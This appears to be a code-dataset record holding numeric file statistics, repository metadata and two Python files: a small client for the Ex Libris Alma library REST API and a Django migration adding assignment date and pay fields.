12,764
179,364
4.164447
0.018803
0.030025
0.030816
0.044511
0.955658
0.941925
0.935848
0.925388
0.917675
0.908607
0
0.018559
0.57792
179,364
4,197
119
42.73624
0.683565
0.007744
0
0.914991
0
0
0.065575
0.00032
0
0
0
0
0.006872
1
0.005599
false
0
0.0028
0.001273
0.010944
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
fb5669294d062d35bf0b2ad4f79549ec852a8ebf
4,527
py
Python
alma_api/__init__.py
JonkopingUniversityLibrary/almaapi
40f43e54fdc1406e2222331e8be88228246a3bb9
[ "MIT" ]
1
2020-02-07T03:26:50.000Z
2020-02-07T03:26:50.000Z
alma_api/__init__.py
JonkopingUniversityLibrary/almaapi
40f43e54fdc1406e2222331e8be88228246a3bb9
[ "MIT" ]
null
null
null
alma_api/__init__.py
JonkopingUniversityLibrary/almaapi
40f43e54fdc1406e2222331e8be88228246a3bb9
[ "MIT" ]
null
null
null
"""Minimal client for the Ex Libris Alma REST API (EU region)."""

import json
import xml.etree.ElementTree as ElementTree

import httplib2 as http


class AlmaAPIException(Exception):
    """Raised when an Alma API call times out or returns a non-200 response."""


class AlmaAPI:
    """Thin wrapper around one Alma API area (e.g. 'bibs', 'users').

    Each HTTP helper returns the decoded response body on success,
    ``False`` when required arguments are missing, and raises
    :class:`AlmaAPIException` on timeouts or non-200 responses.
    """

    def __init__(self, api, api_key):
        # Base URL for the chosen API area; the key is appended as the
        # first query parameter of every request.
        self.api_url = 'https://api-eu.hosted.exlibrisgroup.com/almaws/v1/' + api + '/'
        self.api_key = '?apikey=' + api_key

    def _build_url(self, request, query_params):
        """Assemble the full request URL, appending optional query params."""
        extra = ''
        if query_params is not None:
            for key, value in query_params.items():
                extra += '&' + key + '=' + value
        return self.api_url + request + self.api_key + extra

    @staticmethod
    def _extract_error_message(content, query_params):
        """Pull a human-readable message out of an Alma error payload.

        The payload format follows the request's ``format`` query param:
        JSON when it was 'json', XML otherwise.  May raise
        ``ElementTree.ParseError`` for malformed XML bodies.
        """
        # BUGFIX: the original indexed query_params['format'] directly,
        # which raised TypeError when query_params was None and KeyError
        # when 'format' was absent — crashing instead of reporting.
        if query_params is not None and query_params.get('format') == 'json':
            error_data = json.loads(content)
            try:
                return error_data['errorList']['error'][0]['errorMessage']
            except (KeyError, IndexError, TypeError):
                return 'Unknown Error'
        root = ElementTree.ElementTree(ElementTree.fromstring(content)).getroot()
        # Alma's XML error envelope: <...><errorList><error><errorMessage>
        return root[1][0][1].text

    def _raise_for_status(self, verb, response, content, query_params):
        """Raise AlmaAPIException for any non-200 response."""
        if response.status != 200:
            message = self._extract_error_message(content, query_params)
            raise AlmaAPIException(verb + ' - ' + str(response.status) + ' - ' + message)

    def get(self, *, request=False, query_params=None):
        """Perform a GET; returns decoded body, or False if *request* missing."""
        if request is False:
            return False
        url = self._build_url(request, query_params)
        try:
            (response, content) = http.Http().request(url)
        except TimeoutError as e:
            raise AlmaAPIException('GET - ' + str(e))
        try:
            self._raise_for_status('GET', response, content, query_params)
        except ElementTree.ParseError as e:
            # Error body itself was unparseable XML.
            raise AlmaAPIException('GET - ' + str(e))
        return content.decode('utf8')

    def _send(self, verb, *, request, body, query_params, content_type):
        """Shared implementation for body-carrying verbs (PUT/POST)."""
        if request is False or body is False:
            return False
        url = self._build_url(request, query_params)
        headers = {'Content-type': content_type}
        try:
            (response, content) = http.Http().request(url, verb, headers=headers, body=body)
        except TimeoutError as e:
            raise AlmaAPIException(verb + ' - ' + str(e))
        self._raise_for_status(verb, response, content, query_params)
        return content.decode('utf8')

    def put(self, *, request=False, body=False, query_params=None, content_type='application/xml'):
        """Perform a PUT; returns decoded body, or False on missing args."""
        return self._send('PUT', request=request, body=body,
                          query_params=query_params, content_type=content_type)

    def post(self, *, request=False, body=False, query_params=None, content_type='application/xml'):
        """Perform a POST; returns decoded body, or False on missing args."""
        return self._send('POST', request=request, body=body,
                          query_params=query_params, content_type=content_type)
40.061947
100
0.557765
469
4,527
5.179104
0.166311
0.095101
0.039522
0.054343
0.869494
0.857555
0.850144
0.809798
0.789625
0.746809
0
0.008508
0.324939
4,527
112
101
40.419643
0.786322
0.003534
0
0.795455
0
0
0.081243
0
0
0
0
0
0
1
0.045455
false
0
0.034091
0
0.170455
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
fb76a1e850f3866efdffdbab40e5b2481bba9f12
2,293
py
Python
talentmap_api/position/migrations/0006_auto_20180111_1740.py
burgwyn/State-TalentMAP-API
1f4f3659c5743ebfd558cd87af381f5460f284b3
[ "CC0-1.0" ]
5
2018-08-09T18:51:12.000Z
2021-11-08T10:28:17.000Z
talentmap_api/position/migrations/0006_auto_20180111_1740.py
burgwyn/State-TalentMAP-API
1f4f3659c5743ebfd558cd87af381f5460f284b3
[ "CC0-1.0" ]
232
2017-06-16T02:09:54.000Z
2018-05-10T16:15:48.000Z
talentmap_api/position/migrations/0006_auto_20180111_1740.py
burgwyn/State-TalentMAP-API
1f4f3659c5743ebfd558cd87af381f5460f284b3
[ "CC0-1.0" ]
4
2018-06-13T14:49:27.000Z
2021-06-30T22:29:15.000Z
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-01-11 17:40
from __future__ import unicode_literals

from django.db import migrations, models


def _add_field_ops(model_name):
    """Return the four AddField operations applied to *model_name*.

    The same columns are added to both the live model and its
    historical shadow model, so the spec lives in one place.
    """
    return [
        migrations.AddField(
            model_name=model_name,
            name='arrival_date',
            field=models.DateTimeField(help_text='The date the incumbent arrived at the position', null=True),
        ),
        migrations.AddField(
            model_name=model_name,
            name='bid_approval_date',
            field=models.DateTimeField(default='1975-01-01T00:00:00Z', help_text='The date the bid for this assignment was approved'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name=model_name,
            name='combined_differential',
            field=models.IntegerField(default=0, help_text='The combined differential (danger pay and differential) for this assignment'),
        ),
        migrations.AddField(
            model_name=model_name,
            name='domestic',
            field=models.BooleanField(default=False, help_text='Indicates if this position is domestic'),
        ),
    ]


class Migration(migrations.Migration):

    dependencies = [
        ('position', '0005_auto_20180110_1917'),
    ]

    # Live model first, then the historical copy — same order as the
    # originally generated operations list.
    operations = _add_field_ops('assignment') + _add_field_ops('historicalassignment')
39.534483
138
0.632795
237
2,293
5.978903
0.308017
0.101623
0.129852
0.152435
0.863797
0.863797
0.741002
0.741002
0.741002
0.741002
0
0.037455
0.266463
2,293
57
139
40.22807
0.804994
0.029655
0
0.84
1
0
0.325383
0.029253
0
0
0
0
0
1
0
false
0
0.04
0
0.1
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8